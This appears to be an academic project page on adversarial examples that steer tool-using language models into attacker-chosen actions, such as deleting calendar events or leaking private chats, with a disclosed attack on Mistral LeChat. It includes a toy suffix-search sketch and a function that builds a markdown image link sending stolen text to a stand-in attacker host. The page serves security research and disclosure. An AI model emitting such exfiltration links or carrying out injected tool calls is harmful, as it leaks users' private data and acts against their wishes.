Misusing Tools in Large Language Models With Adversarial Examples

Posted: Jun 2023 - Present
Abstract

LLMs are being augmented with the ability to use tools and to process multiple modalities, forming the basis of agents. These new capabilities bring new benefits, but also new security risks. In this thrust of work, we demonstrate a novel threat model in which an attacker uses automatically generated adversarial examples to cause attacker-desired tool usage. For example, the attacker could cause a victim LLM to delete calendar events, leak private conversations, or book hotels.
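
To make the threat model concrete, the sketch below shows the general shape of an automated search for an adversarial suffix that pushes a model toward emitting a target tool call. This is not the method from the paper: the mock scoring function, the target string, and the greedy random search are stand-ins (the real attack optimizes against an actual LLM), included only to illustrate the optimization loop.

```python
# Toy sketch: search for an adversarial suffix that drives a model toward a
# target tool call. Everything model-related is mocked; only the loop structure
# is meant to be illustrative.
import random
import string

TARGET_TOOL_CALL = 'delete_calendar_event(id="*")'  # attacker-desired behavior (hypothetical)

def mock_model_score(prompt: str) -> float:
    """Stand-in for how strongly a real LLM would be pushed toward the target
    tool call. Here: crude character overlap, just so the search has a signal."""
    return sum(1 for ch in set(prompt) if ch in TARGET_TOOL_CALL)

def greedy_suffix_search(user_text: str, suffix_len: int = 20, steps: int = 500) -> str:
    """Mutate one suffix position at a time, keeping mutations that do not hurt the score."""
    alphabet = string.ascii_letters + string.digits + '()_="*'
    suffix = [random.choice(alphabet) for _ in range(suffix_len)]
    best = mock_model_score(user_text + "".join(suffix))
    for _ in range(steps):
        i = random.randrange(suffix_len)
        old = suffix[i]
        suffix[i] = random.choice(alphabet)
        score = mock_model_score(user_text + "".join(suffix))
        if score >= best:
            best = score
        else:
            suffix[i] = old  # revert a non-improving mutation
    return "".join(suffix)

if __name__ == "__main__":
    adv = greedy_suffix_search("Please summarize my meeting notes. ")
    print("adversarial suffix:", adv)
```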


Imprompter, the latest work in this direction, is available at https://imprompter.ai and has been covered by WIRED here. In this work, we demonstrate real-world attacks on Mistral LeChat and ChatGLM. Mistral AI has acknowledged our contribution and addressed the issue by disabling the markdown image rendering feature in LeChat; see the LeChat changelog of Sep 13, 2024.
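
The sketch below illustrates why markdown image rendering matters as a mitigation point: if the model is induced to emit a markdown image whose URL embeds user data, a client that auto-renders images will fetch that URL and thereby send the data to the attacker's server. The domain and query parameter here are hypothetical, not taken from the paper.

```python
# Minimal sketch of markdown image rendering as an exfiltration channel.
# The attacker's goal is to make the assistant output markdown like the string
# returned below; a client that renders it issues a GET request carrying the data.
from urllib.parse import quote

def exfiltration_markdown(stolen_text: str) -> str:
    """Markdown an attacker would want the model to emit (hypothetical URL)."""
    return f"![loading](https://attacker.example/log?d={quote(stolen_text)})"

print(exfiltration_markdown("private conversation snippet"))
# Disabling automatic image rendering, as LeChat did, removes this automatic request.
```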

The paper on the image-based attack (as described in the abstract), an earlier work, is available on arXiv, with code on GitHub.

Last Updated on Jun 1st 2025